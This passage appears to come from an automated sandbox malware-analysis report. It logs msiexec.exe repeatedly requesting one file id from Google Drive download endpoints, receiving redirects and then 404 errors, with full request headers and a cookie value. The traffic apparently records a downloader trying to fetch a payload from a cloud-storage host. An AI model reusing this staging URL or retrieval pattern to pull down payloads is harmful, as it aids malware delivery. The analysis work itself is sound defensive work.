                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-y-bU6W2ukGrv4sEXzuw6lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              23          192.168.2.8  49732        172.217.16.193  443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:18 UTC  460                OUT        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:18 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSpW8xOBkAT9QS_U2uFK7G2-VYKzvqNwhAZcILYHX2sLMQqgTchQtfFpiSW_7er8LZI
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:18 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-_1VUzfPAhMgPFEk-nWcpKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:18 UTC  1652               IN
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VgIzSDxjbmw_5DfOYUQaJA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              24          192.168.2.8  49733        216.58.206.46   443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:19 UTC  418                OUT        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:19 UTC  1920               IN         HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:19 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-fImjNcpKB277T8onfsvITQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              25          192.168.2.8  49734        172.217.16.193  443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
                                                              2025-01-10 23:02:20 UTC  460                OUT        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:20 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTWTk6Rnm6tHw3CUxkSbHBSNqRqmWJ-rLpAywEjnUSZpEXOaDvgXiG2sv1tywhr9DQo
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:20 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-YzHRFf_zHNuMlgTDexlLrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:20 UTC  1652               IN
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tMRlimqqAXvGJm8ql6T4pg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.8 | 49735 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:21 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:22 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-rk0cbAz84vXOS32KeytTzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.8 | 49736 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:22 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQbtT-SmhVWmbRcqzXReMvBwkPJ50Yw4cSFweR62CINTu7OcglTdyk0EDIsuebAxWIt
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:23 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-3Ufck2_7x0RIrS75j7neiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Qjk1Ef20flDmcVxxJPG-PA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.8 | 49737 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:24 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:24 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:24 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-0in2JmARNOQ2U8Q631e6UQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              29 | 192.168.2.8 | 49738 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:25 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:25 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6M2NSFkfJFvcrBtQ_XHtvHGsKKJ6vXRXKJIpBUQsOTZ1hIO1-8TWika3XjNPQ42cm32P5sXNE
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:25 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-B3Toi5nMbhkHph8dgDbyBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:25 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DB4tTID7xjsa0MpP9JHjbQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              30 | 192.168.2.8 | 49739 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:26 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:26 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:26 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-ixsUNiJqISoTwa_1afyU5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              31 | 192.168.2.8 | 49740 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:27 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:27 UTC | 1851 | IN | HTTP/1.1 404 Not Found
